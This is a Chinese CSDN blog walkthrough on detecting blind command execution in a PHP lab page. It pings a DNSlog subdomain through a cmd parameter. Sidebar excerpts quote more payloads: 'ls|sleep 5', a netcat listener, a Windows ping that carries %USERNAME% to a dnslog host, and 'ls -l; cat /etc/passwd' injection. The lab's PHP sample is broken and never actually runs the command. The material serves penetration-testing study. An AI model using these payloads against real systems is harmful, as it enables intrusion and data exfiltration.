【命令执行】命令执行漏洞无回显如何渗透

最新推荐文章于 2024-04-20 00:47:16 发布
最新推荐文章于 2024-04-20 00:47:16 发布
阅读量549 收藏
点赞数
分类专栏: 命令执行 项目 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134540036
版权

环境搭建:

1.创建text.php文件

<?php
    if(isset($_GET['cmd'])) {
        $cmd=$_GET['cmd'];
        '$cmd';
 }else{
    echo"?cmd=whoami";
 }

?>

漏洞复现

1.执行命令执行

?cmd=whoami

没有回显

2.使用DNS绕过

  • 请求一个临时域名

emkxoclycy.dgrh3.cn

  • ping 生成的临时子域名

?cmd=ping myxsoruszt.dgrh3.cn

  • 3.去Dnslog查看是否有回显。

有回显证明可以进行命令执行

wj33333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro_attack:shiro反序列化进攻综合利用,包含(回显执行命令注入内存马)
03-11
shiro反序列化进攻综合利用项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存马检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行集成公用集合K1 / K2...
[CTF]命令执行回显利用
cosmoslin的博客
02-21 7277
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 587
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
命令执行 rce各种绕过技巧_命令执行 被过滤,吊打面试官-网络安全中高级面试题
最新发布
2401_83974142的博客
04-20 791
命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞成因命令执行漏洞形成的原因是web服务器对用户输入的命令安全监测不足,导致恶意代码被执行。接下来是各种命令执行的绕过技巧。
命令执行回显的一些姿势
zhangge3663的博客
05-31 3275
前言 最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行回显的一些姿势 windows环境 1.ping %USERNAME%.2plmqc.dnslog.cn 这里的%username%为用户变量 附上windows常用变量: %APPDATA% : 列出应用程序数据的默认存放位置。 %CD% : 列出当前目录。 %CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。 %CMDCMDLINE% : 列出启动当前
超全的命令(代码)执行漏洞回显的姿势总结(附带详细代码和测试分析过程)
记录学习,一起进步
03-05 1531
通过:重定向,dnslog外部通信,burpsuite burpcollaborator外部通信,日志监听,netcat监听,反弹shell等不同姿势突破无回显命令执行漏洞
php命令执行漏洞回显时的渗透方法
WSGWZlz的博客
11-21 63
渗透测试过程中,有些地方存在可疑的漏洞但通过注入点或者利用点进行测试的时候前端页面不会给我们显示回显。在这种情况下我们就可以使用dnslog的方式来判断漏洞的存在性。亦可以使用python启用一个http的方式来进行判断。
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 2998
渗透测试-文件包含漏洞以及php伪协议的应用
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
java反序列化漏洞利用工具WebLogicExploit
01-14
jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: we blogic回显结果测试中,稍后加入
java反序列化漏洞利用工具
01-14
1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版...4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境
PHP基础学习【针对渗透
m0_55854679的博客
12-11 1262
PHP基础教程 PHP属于后端语言,后端的核心在于与数据库交互。 常见的后端语言:ASP、ASPX、PHP、JSP 什么是PHP? PHP(超文本预处理器)是一种通用开源脚本语言,是动态语言的一种,动态语言还包括ASP、ASPX、JSP。 PHP语法吸收了C、java、Perl的特点,主要用于web开发领域。 PHP可以将程序嵌入到前端代码(HTML、CSS、JS)执行。 PHP支持几乎所有流行的数据库以及操作系统。 基本语法 PHP头部标记风格 <?php ?> <script
回显条件下的命令执行判断和利用方式研究
m0_59598029的博客
08-16 356
渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显命令执行点。面对这些无回显命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
带外攻击(OOB)RCE无回显思路总结详解
qq_71467825的博客
06-23 1185
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。
WEB渗透—PHP反序列化(十一)
haosha。的博客
12-31 1401
Web渗透—PHP反序列化课程学习分享(课程非本人制作,仅提供学习分享)
记一次phpstudy后门引发的渗透测试
wuli1024的博客
01-19 991
前段时间 phpstudy 被爆出存在后门,想到学校里的许多站都是用 phpstudy 做的环境,于是写了个脚本扫描了下,发现真的有中招的。
命令执行漏洞无回现如何渗透
m0_62202418的博客
11-25 388
3. 有两条记录,说明服务器ping了域名,则存在命令执行漏洞。2. ping 一下生成的域名。执行命令时,没有任何回显
怎么对exec函数进行漏洞利用,并且回显
06-13
由于exec函数是用来执行外部命令的,因此漏洞利用的方式就是通过构造恶意命令,注入到exec函数的参数中,从而执行攻击者想要的任意命令。举个例子,如果一个程序中使用了类似如下的exec函数: ``` char* cmd = "ls -l"; exec(cmd); ``` 攻击者可以构造一个恶意的cmd参数,如下所示: ``` char* cmd = "ls -l; cat /etc/passwd"; exec(cmd); ``` 这个恶意的命令执行ls -l命令,然后在其后面加上一个分号,然后再执行cat /etc/passwd命令,从而读取系统的密码文件。这种漏洞利用方式被称为命令注入攻击。 为了回显执行结果,攻击者可以将恶意命令的输出重定向到一个文件中,然后再读取文件内容。例如,攻击者可以将上面的恶意命令改为: ``` char* cmd = "ls -l > /tmp/output; cat /tmp/output"; exec(cmd); ``` 这个命令执行ls -l命令,并将输出重定向到/tmp/output文件中,然后再执行cat /tmp/output命令,从而读取文件内容并输出到控制台上。 需要注意的是,这种漏洞利用方式非常危险,攻击者可以在受攻击的系统上执行任意命令,导致系统被完全控制。因此,在编写程序时应该对exec函数传入的参数进行充分的过滤和验证,避免注入恶意命令

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值